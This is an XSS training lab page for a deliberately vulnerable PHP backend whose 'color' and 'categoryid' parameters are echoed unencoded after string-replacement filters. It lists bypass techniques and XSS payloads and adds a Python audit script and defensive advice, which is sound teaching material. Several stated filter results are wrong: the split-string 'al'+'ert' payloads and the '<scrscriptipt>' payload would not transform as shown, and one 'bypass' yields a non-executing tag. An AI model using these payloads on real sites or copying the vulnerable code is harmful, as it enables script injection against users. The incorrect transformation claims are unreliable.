Advanced Filtering XSS Lab

Test XSS with complex transformation filters

Advanced Filtering Challenge

Lab Overview

This lab demonstrates advanced filtering techniques with different transformation approaches for different parameters, creating a complex security testing environment.

Multiple Filter Types: This application uses different filtering strategies for different parameters, including string replacement with transformations.
Hidden Parameters: There are multiple hidden parameters not shown in the main form. Use tools like Arjun to discover them!
# use arjun tool to find hidden parameter
Parameter Filtering Methods:
  • Secure: fname, lname - uses htmlspecialchars()
  • Transformation: color - replaces 'script' with 'alert'
  • Function Filter: categoryid - replaces dialog functions with '/'
  • Complex: multiple transformation filters
Filter Transformations:
Parameter    Input Example                    After Filter                 Transformation
color        <script>alert(1)</script>        <alert>alert(1)</alert>      'script' → 'alert'
categoryid   alert(1);confirm(2);prompt(3)    /(1);/(2);/(3)               'alert','confirm','prompt' → '/'
Filter Complexity: Advanced Transformation Filters

Objective: Test XSS payloads against the advanced transformation filters and find ways to exploit the filter behavior to execute JavaScript.

Backend Source Code
<?php
// fname / lname: encoded with htmlspecialchars(), so <, >, &, " and ' are rendered as text
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// color: one case-sensitive replacement of 'script' with 'alert'; result is echoed unencoded
elseif(isset($_GET["color"])){
    $re = str_replace('script', 'alert', $_GET['color']);
    echo $re;
}
// categoryid: each dialog function name is replaced with '/'; result is echoed unencoded
elseif(isset($_GET["categoryid"])){
    $arr = array('alert','confirm','prompt');
    $re = str_replace($arr, '/', $_GET['categoryid']);
    echo $re;
}
Test Input Forms
Visible Parameters (HTML Encoded)
  • fname, lname: each uses htmlspecialchars() encoding
Hidden Parameters
Hint: The 'color' and 'categoryid' parameters are not shown in the main form but are implemented in the backend with advanced filtering.
  • color: replaces 'script' with 'alert'
  • categoryid: replaces 'alert','confirm','prompt' with '/'
Advanced Bypass Techniques
Color Parameter Bypasses:
  • Exploit transformation: Use payloads that become valid after 'script' → 'alert'
    • <script>prompt(1)</script> → <alert>prompt(1)</alert>
    • Try using 'script' in contexts where it becomes useful after transformation
  • Case variation: Use <SCRIPT>, <Script>
  • Alternative tags: Use <img>, <svg>, <body>
Category ID Parameter Bypasses:
  • Alternative functions: Use console.log, document.write, print
  • Function obfuscation:
    • window['al'+'ert'](1)
    • eval('al'+'ert(1)')
    • Function('al'+'ert(1)')()
  • Exploit replacement: Use payloads where '/' creates valid syntax
Creative Exploitation Techniques:
  • Double transformation: Create payloads that work after both transformations
  • Context switching: Use different execution contexts (HTML, JavaScript, CSS)
  • Encoding: Use HTML entities, Unicode, or Base64 encoding
  • Template literals: Use JavaScript template literals for dynamic execution
Security Implications

Advanced filtering demonstrates:

  • Transformation filters can create new attack vectors
  • Multiple filter types increase complexity but not necessarily security
  • String replacement can be exploited to create valid payloads
  • Context-aware filtering is more effective than simple replacements
  • Complex filters can create a false sense of security
  • Proper output encoding is still the most reliable defense
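To make the last two points concrete, here is an added example (not code from the lab itself) that re-implements the three backend filters in Python with the semantics of PHP's htmlspecialchars(..., ENT_QUOTES) and str_replace(), then checks whether a raw tag opener still reaches the browser after each filter. The audit() helper, the RAW_TAG pattern and the sample inputs are constructed for this example.

```python
import re

# Added example: the lab's three PHP filters re-implemented in Python so their
# real output can be inspected offline. filter_secure mirrors
# htmlspecialchars($v, ENT_QUOTES); the other two mirror str_replace().

def filter_secure(value: str) -> str:
    """htmlspecialchars(..., ENT_QUOTES): the five significant characters become entities."""
    table = {"&": "&amp;", '"': "&quot;", "'": "&#039;", "<": "&lt;", ">": "&gt;"}
    return "".join(table.get(ch, ch) for ch in value)

def filter_color(value: str) -> str:
    """str_replace('script', 'alert', ...): one case-sensitive, non-recursive pass."""
    return value.replace("script", "alert")

def filter_categoryid(value: str) -> str:
    """str_replace(array('alert','confirm','prompt'), '/', ...): one pass per name, in order."""
    for name in ("alert", "confirm", "prompt"):
        value = value.replace(name, "/")
    return value

# Both transformation filters echo their result into the HTML body unencoded, so
# the defender's question is simply whether a raw tag opener survives the filter.
RAW_TAG = re.compile(r"</?[a-zA-Z]")  # constructed check for this example

def markup_survives(filtered: str) -> bool:
    """True if the browser would parse `filtered` as markup rather than as text."""
    return RAW_TAG.search(filtered) is not None

LAB_FILTERS = {"color": filter_color, "categoryid": filter_categoryid}

def audit(param: str, value: str) -> dict:
    """Compare the lab filter for `param` with plain HTML encoding on one input."""
    lab_out = LAB_FILTERS[param](value)
    enc_out = filter_secure(value)
    return {
        "lab_output": lab_out,
        "lab_markup_survives": markup_survives(lab_out),
        "encoded_output": enc_out,
        "encoded_markup_survives": markup_survives(enc_out),
    }

if __name__ == "__main__":
    # Constructed inputs with the same shape as the payload tables on this page.
    for param, value in [("color", "<script>prompt(1)</script>"),
                         ("color", "<img src=x onerror=alert(1)>"),
                         ("categoryid", "document.write('<script>alert(1)</script>')")]:
        print(param, audit(param, value))
```

Running it shows that every transformation-filter output still contains a tag, while the htmlspecialchars() path turns each input into inert text, which is why the lab's "secure" parameters are the only ones that hold.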
Best Practices

For secure web applications:

  • Use context-aware output encoding instead of transformations
  • Implement strict Content Security Policy (CSP) headers
  • Validate input using strict whitelists, not blacklists
  • Use modern sanitization libraries (DOMPurify, etc.)
  • Avoid transformation filters that can be exploited
  • Conduct comprehensive security testing with various payloads
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
Payload Examples for Advanced Filters
Color Parameter Payloads:
  • <script>prompt(1)</script> → becomes <alert>prompt(1)</alert>
  • <scrscriptipt>alert(1)</scrscriptipt> → becomes <alert>alert(1)</alert>
  • <SCRIPT>alert(1)</SCRIPT> → remains unchanged (case-sensitive)
  • <img src=x onerror=alert(1)> → remains unchanged
Category ID Parameter Payloads:
  • console.log(1) → remains unchanged
  • window['al'+'ert'](1) → becomes window['/'+'/'](1)
  • eval('al'+'ert(1)') → becomes eval('/'+'/(1)')
  • document.write('<script>alert(1)</script>') → becomes document.write('<script>/(1)</script>')
Creative Exploitation Payloads:
  • Combined exploitation: Payloads that work across both filters
  • Context-based: Payloads that work in specific execution contexts
  • DOM-based: Payloads that leverage DOM manipulation
  • Event-based: Payloads that use event handlers without blocked functions